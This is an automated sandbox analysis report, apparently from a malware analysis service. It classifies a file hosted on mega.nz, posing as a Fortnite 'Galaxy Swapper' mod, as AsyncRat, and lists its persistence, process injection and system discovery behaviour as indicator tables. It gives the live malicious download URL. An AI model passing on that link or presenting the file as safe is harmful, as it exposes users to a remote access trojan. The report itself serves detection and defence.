Analysis Overview
Threat Level: Known bad
The file https://mega.nz/file/CUt1QDyR#n6vgudTHTYgM_mZuot-SW_zmhiqVQXzqt_2RFi4uTMM was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Enumerates connected drives
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Browser Information Discovery
NTFS ADS
Modifies data under HKEY_USERS
Enumerates system info in registry
Checks SCSI registry key(s)
Checks processor information in registry
Delays execution with timeout.exe
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: AddClipboardFormatListener
Scheduled Task/Job: Scheduled Task
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-02 15:27
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-02 15:27
Reported
2024-08-02 15:41
Platform
win10v2004-20240802-es
Max time kernel
602s
Max time network
606s
Command Line
Signatures
AsyncRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Bivaji Coms\BivaApp\UnRAR.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Bivaji Coms\BivaApp\rnpkeys.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Server-Host.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Bivaji Coms\BivaApp\rnpkeys.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\E: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\F: | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\D: | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\System32\msiexec.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk | C:\Windows\System32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5140 set thread context of 5220 | N/A | C:\Users\Admin\AppData\Roaming\Bivaji Coms\BivaApp\rnpkeys.exe | C:\Windows\SysWOW64\explorer.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\MSIEF44.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{EE732749-08BE-4A8A-B918-99E4E0373581} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIED6E.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF168.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF198.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI21D7.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI21F7.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI24B8.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI2197.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5aea61.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e5aea61.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIFEC9.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIFEE9.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI2148.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF1E7.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI40B.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5aea65.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI2236.tmp | C:\Windows\system32\msiexec.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Server-Host.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_CLASSES\7-ZIP.RAR\SHELL\OPEN\COMMAND | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.cab | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.lzma\shell\open\command | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.7z\shell\open | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.xz\DefaultIcon\ = "C:\\Program Files\\7-Zip\\7z.dll,23" | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.txz\DefaultIcon | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.lzma\shell\open | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.tar\shell | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.zip\ = "7-Zip.zip" | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.rar\shell\ | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.tar\shell\open | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.rar | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.cab | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.rar | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.iso | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.txz | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.rar\ = "rar Archive" | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.iso\shell\open | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.tar\shell\open\command\ = "\"C:\\Program Files\\7-Zip\\7zFM.exe\" \"%1\"" | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.zip\DefaultIcon | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.xz\shell\open | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.tar\shell\open | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.bz2\ = "7-Zip.bz2" | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.bz2\shell\open\command | C:\Program Files\7-Zip\7zFM.exe | N/A |
